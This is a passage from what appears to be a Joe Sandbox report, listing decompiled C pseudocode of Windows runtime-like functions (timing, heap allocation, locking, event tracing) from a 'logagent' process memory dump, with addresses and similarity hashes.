						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E051E6A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}


















                                              0x051f6de6
                                              0x051f6dee
                                              0x051f6df1
                                              0x051f6df4
                                              0x051f6dfd
                                              0x052305d3
                                              0x052305d3
                                              0x052305e4
                                              0x052305f9
                                              0x052305f9
                                              0x052305fe
                                              0x051f6e96
                                              0x051f6e9c
                                              0x051f6e9c
                                              0x051f6e03
                                              0x051f6e09
                                              0x051f6e0c
                                              0x051f6e12
                                              0x051f6e15
                                              0x051f6e1b
                                              0x052305a1
                                              0x051f6eb1
                                              0x051f6eb1
                                              0x051f6eb1
                                              0x051f6e21
                                              0x051f6e2a
                                              0x051f6e9f
                                              0x051f6eab
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051f6eab
                                              0x051f6e2c
                                              0x051f6e34
                                              0x00000000
                                              0x051f6e3d
                                              0x051f6e3d
                                              0x051f6e42
                                              0x051f6e4d
                                              0x052305ac
                                              0x052305b2
                                              0x052305b2
                                              0x00000000
                                              0x052305ac
                                              0x051f6e56
                                              0x051f6e59
                                              0x051f6e5d
                                              0x051f6e5f
                                              0x051f6e64
                                              0x051f6e94
                                              0x051f6e94
                                              0x00000000
                                              0x051f6e94
                                              0x051f6e6a
                                              0x051f6e6d
                                              0x052305ba
                                              0x052305bd
                                              0x052305ca
                                              0x052305cc
                                              0x051f6e91
                                              0x051f6e91
                                              0x00000000
                                              0x051f6e91
                                              0x052305c0
                                              0x00000000
                                              0x052305c0
                                              0x051f6e7e
                                              0x051f6e7e
                                              0x051f6e80
                                              0x051f6e86
                                              0x00000000
                                              0x00000000
                                              0x051f6eba
                                              0x051f6eba
                                              0x051f6e88
                                              0x051f6e8b
                                              0x051f6e8f
                                              0x00000000
                                              0x051f6e8f

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                              • Instruction ID: b3375401cce3bfc3cddeee5bb6d94217b970ce55fa7ed706372d94163a4ac4d5
                                              • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                              • Instruction Fuzzy Hash: C631B272204205DFC728CF69C584AAAB7A6FFC5314F15C95EE55A8B252DB31F882CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EA70E Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E051EA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x52a7b10; // 0x9
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x52a7b10 = 8;
					 *0x52a7b14 = 0x52a7b0c;
					 *0x52a7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0xa
					E051EA990(0x52a7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L051EA840(__edx, __ecx, __ecx, _t52, 0x52a7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x52a7b10; // 0x9
					_t3 = _t37 + 0x27; // 0x30
					__eflags = _t3 >> 5 -  *0x52a7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x52a7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x30
						_v8 = _t4 >> 5;
						_t50 = L051D4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x52a7b18 = _v8;
						_t8 = _t52 + 7; // 0x10
						E051FF3E0(_t50,  *0x52a7b14, _t8 >> 3);
						_t28 =  *0x52a7b14; // 0x77e07b0c
						__eflags = _t28 - 0x52a7b0c;
						if(_t28 != 0x52a7b0c) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x11
						 *0x52a7b14 = _t50;
						_t48 = _v12;
						 *0x52a7b10 = _t9;
						goto L6;
					}
					 *0x52a7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                              0x051ea713
                                              0x051ea714
                                              0x051ea717
                                              0x051ea71d
                                              0x051ea720
                                              0x051ea722
                                              0x051ea727
                                              0x051ea74a
                                              0x051ea754
                                              0x051ea75e
                                              0x051ea768
                                              0x051ea76a
                                              0x051ea773
                                              0x051ea78b
                                              0x051ea790
                                              0x051ea792
                                              0x051ea741
                                              0x051ea741
                                              0x051ea743
                                              0x051ea749
                                              0x051ea749
                                              0x051ea732
                                              0x051ea73a
                                              0x051ea797
                                              0x051ea79d
                                              0x051ea7a3
                                              0x051ea7a9
                                              0x051ea7b6
                                              0x051ea7bc
                                              0x051ea7ca
                                              0x051ea7e0
                                              0x051ea7e2
                                              0x051ea7e4
                                              0x05229bf2
                                              0x00000000
                                              0x05229bf2
                                              0x051ea7ed
                                              0x051ea7f2
                                              0x051ea800
                                              0x051ea805
                                              0x051ea80d
                                              0x051ea812
                                              0x05229c08
                                              0x05229c08
                                              0x051ea818
                                              0x051ea81b
                                              0x051ea821
                                              0x051ea824
                                              0x00000000
                                              0x051ea824
                                              0x051ea7ae
                                              0x00000000
                                              0x051ea7ae
                                              0x051ea73c
                                              0x051ea73e
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c16b2f9f207c65f8c8bfbc1cbf1640bcdb58afd6a1a9213a6a6d4b4aef121c0f
                                              • Instruction ID: c2c128a4df01f1aa060ac123ad5f470ed1c3ae5e4e4c4180e902d112cec0f7da
                                              • Opcode Fuzzy Hash: c16b2f9f207c65f8c8bfbc1cbf1640bcdb58afd6a1a9213a6a6d4b4aef121c0f
                                              • Instruction Fuzzy Hash: 1C31AFF2720601ABC715DF18E889F69BBFAFF84710F190D5AF00587282DBB1A945CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E61A0 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E051E61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E051E5E50(0x51967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05289D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E051BF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                              0x051e61b3
                                              0x051e61b5
                                              0x051e61bd
                                              0x051e61c3
                                              0x051e61c7
                                              0x051e61d2
                                              0x051e61ff
                                              0x051e61ff
                                              0x051e6201
                                              0x051e6207
                                              0x051e6207
                                              0x051e61d4
                                              0x051e61d9
                                              0x00000000
                                              0x00000000
                                              0x051e61df
                                              0x051e61e2
                                              0x00000000
                                              0x00000000
                                              0x051e61e6
                                              0x051e61e8
                                              0x051e61ee
                                              0x051e61ee
                                              0x051e61f9
                                              0x0522762f
                                              0x05227632
                                              0x05227635
                                              0x05227639
                                              0x05227640
                                              0x0522766e
                                              0x05227675
                                              0x00000000
                                              0x00000000
                                              0x05227681
                                              0x05227689
                                              0x0522768d
                                              0x05227691
                                              0x05227695
                                              0x05227699
                                              0x052276af
                                              0x052276b5
                                              0x052276b7
                                              0x052276b7
                                              0x052276d7
                                              0x052276dc
                                              0x00000000
                                              0x052276dc
                                              0x052276a2
                                              0x052276a9
                                              0x05227651
                                              0x05227653
                                              0x05227653
                                              0x05227656
                                              0x05227656
                                              0x00000000
                                              0x05227656
                                              0x05227644
                                              0x05227646
                                              0x05227648
                                              0x05227648
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e19ce30ea733142dc4205a161380e45528bb51ee127f56944d958d9a499b8bf1
                                              • Instruction ID: a7572e1cbe101f43f27f23d48480ea1b8f73188aaf9df9d00297fabc699205ac
                                              • Opcode Fuzzy Hash: e19ce30ea733142dc4205a161380e45528bb51ee127f56944d958d9a499b8bf1
                                              • Instruction Fuzzy Hash: 7031CB716197129FD720CF09C800B2AB7E5FF98B00F49896DE9899B351E7B0E844CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BAA16 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E051BAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x52ad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x52a7b9c; // 0x0
					_t53 = L051D4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E051FB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E051FF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L051C6C59(_t53, _t51, _t58) != 0) {
							_t28 = E051E5E50(0x519c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E051EB230(_v32, _v28, 0x519c2d8, 1,  &_v24);
								_t28 = E051BF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                              0x051baa25
                                              0x051baa29
                                              0x051baa2d
                                              0x051baa30
                                              0x051baa37
                                              0x051baa3c
                                              0x05214458
                                              0x05214458
                                              0x05214472
                                              0x05214474
                                              0x05214476
                                              0x051baa64
                                              0x051baa74
                                              0x0521447c
                                              0x05214483
                                              0x05214492
                                              0x051baa52
                                              0x051baa54
                                              0x051baa5e
                                              0x052144a8
                                              0x052144ad
                                              0x052144af
                                              0x052144b6
                                              0x052144b6
                                              0x052144b9
                                              0x052144bc
                                              0x052144cd
                                              0x052144d3
                                              0x052144d6
                                              0x052144e1
                                              0x052144e1
                                              0x052144e6
                                              0x052144e8
                                              0x052144fb
                                              0x052144fb
                                              0x052144e8
                                              0x00000000
                                              0x051baa5e
                                              0x05214476
                                              0x051baa42
                                              0x051baa46
                                              0x051baa48
                                              0x051baa4c
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de37999092a168613d9ccb9c6be0b32e36f2c100a3ccd99a1cf43e3ba104f810
                                              • Instruction ID: 30a80811f2a6da802f61ae5756ae209da26b8964410bc3a535bc7ec97c1b9c6a
                                              • Opcode Fuzzy Hash: de37999092a168613d9ccb9c6be0b32e36f2c100a3ccd99a1cf43e3ba104f810
                                              • Instruction Fuzzy Hash: 9031DFB2A10219ABDF14AF68CD85ABFB7B9FF44700F014469F905EB240EB749911DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F4A2C Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E051F4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x52ad360 ^ _t62;
				_v8 =  *0x52ad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E051D2280(_t26, 0x52a8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E051CFFB0(_t41, _t51, 0x52a8608);
						L2:
						 *0x52ab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E051FB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E051D2280(_t28, 0x52a8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E051CFFB0(_t42, _t53, 0x52a8608);
							if(_t53 != 0) {
								L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E051CFFB0(_t41, _t51, 0x52a8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                              0x051f4a2c
                                              0x051f4a34
                                              0x051f4a3c
                                              0x051f4a3e
                                              0x051f4a48
                                              0x051f4a4b
                                              0x051f4a4d
                                              0x051f4a51
                                              0x051f4a9c
                                              0x00000000
                                              0x00000000
                                              0x051f4aa3
                                              0x051f4aa8
                                              0x051f4aad
                                              0x051f4ab1
                                              0x051f4ade
                                              0x051f4ae3
                                              0x051f4a5a
                                              0x051f4a62
                                              0x051f4a6a
                                              0x051f4a6e
                                              0x0522f203
                                              0x051f4a84
                                              0x051f4a88
                                              0x051f4a89
                                              0x051f4a8a
                                              0x051f4a95
                                              0x051f4a95
                                              0x051f4a79
                                              0x051f4a80
                                              0x051f4af2
                                              0x051f4af4
                                              0x051f4af9
                                              0x051f4aff
                                              0x051f4b01
                                              0x051f4b03
                                              0x051f4b08
                                              0x0522f20a
                                              0x0522f212
                                              0x0522f216
                                              0x0522f216
                                              0x051f4b08
                                              0x051f4b13
                                              0x051f4b1a
                                              0x0522f229
                                              0x0522f229
                                              0x051f4b1a
                                              0x051f4a82
                                              0x00000000
                                              0x051f4a82
                                              0x051f4ab7
                                              0x051f4acd
                                              0x051f4acd
                                              0x051f4ad5
                                              0x051f4ada
                                              0x00000000
                                              0x051f4ada
                                              0x051f4ac2
                                              0x051f4acb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051f4acb
                                              0x051f4a53
                                              0x051f4a53
                                              0x051f4a58
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef012b959f8d3e9a3c515dcc3d501e2d3f133fac2b5f43cf10c75a712abb27d1
                                              • Instruction ID: 1270149682b7ec0a5bd173c7e5e99a7b1ed4d531294c0d43a6409599d29f5794
                                              • Opcode Fuzzy Hash: ef012b959f8d3e9a3c515dcc3d501e2d3f133fac2b5f43cf10c75a712abb27d1
                                              • Instruction Fuzzy Hash: E83100362156509BDB21DF14C989B2BFBA6FFC1B10F054569EA670BA41CBB4D800CBA9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F8EC7 Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E051F8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x52ad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E051E4E70(0x52a86e4, 0x51f9490, 0, 0);
					if( *0x52a53e8 > 5 && E051F8F33(0x52a53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x52a53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x52a53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x519bc46;
						_t48 = E05237B9C(0x52a53e8, 0x519bc46, _t67, 0x52a53e8, _t70,  &_v140);
					}
				}
				return E051FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                              0x051f8ec7
                                              0x051f8ed9
                                              0x051f8edc
                                              0x051f8ee6
                                              0x051f8ee9
                                              0x051f8eee
                                              0x051f8efc
                                              0x051f8f08
                                              0x05231349
                                              0x05231353
                                              0x0523135d
                                              0x05231366
                                              0x0523136f
                                              0x05231375
                                              0x0523137c
                                              0x05231385
                                              0x05231390
                                              0x05231391
                                              0x0523139c
                                              0x0523139d
                                              0x052313a6
                                              0x052313ac
                                              0x052313b2
                                              0x052313b5
                                              0x052313bc
                                              0x052313bf
                                              0x052313c2
                                              0x052313c5
                                              0x052313c8
                                              0x052313cb
                                              0x052313ce
                                              0x052313d1
                                              0x052313d4
                                              0x052313d7
                                              0x052313da
                                              0x052313dd
                                              0x052313e0
                                              0x052313e3
                                              0x052313e6
                                              0x052313e9
                                              0x052313f6
                                              0x05231400
                                              0x05231400
                                              0x051f8f08
                                              0x051f8f32

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e274c2fc064e66145384e111af5db143d9534b10de1b90a409b491136d840cea
                                              • Instruction ID: cd20b858e14af4e511afaee8428364aee4a92a6c2c2b0f746717a928939a17c1
                                              • Opcode Fuzzy Hash: e274c2fc064e66145384e111af5db143d9534b10de1b90a409b491136d840cea
                                              • Instruction Fuzzy Hash: 3941A2B1E10218AFDB24CFAAD981AAEFBF5FF48710F5041AEE509A7241D7745A44CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EE730 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E051EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E051F9670() < 0) {
					L0520DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x52a7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L051D4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M051EE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                              0x051ee730
                                              0x051ee736
                                              0x051ee738
                                              0x051ee73d
                                              0x051ee73e
                                              0x051ee740
                                              0x051ee749
                                              0x051ee765
                                              0x051ee76a
                                              0x051ee76b
                                              0x051ee76c
                                              0x051ee76d
                                              0x051ee76e
                                              0x051ee76f
                                              0x051ee775
                                              0x051ee777
                                              0x051ee77e
                                              0x0522b675
                                              0x051ee784
                                              0x051ee784
                                              0x051ee789
                                              0x051ee7a8
                                              0x051ee7ac
                                              0x051ee807
                                              0x051ee7ae
                                              0x051ee7ae
                                              0x051ee7b1
                                              0x051ee7b4
                                              0x051ee7b9
                                              0x051ee7c0
                                              0x051ee7c4
                                              0x051ee7ca
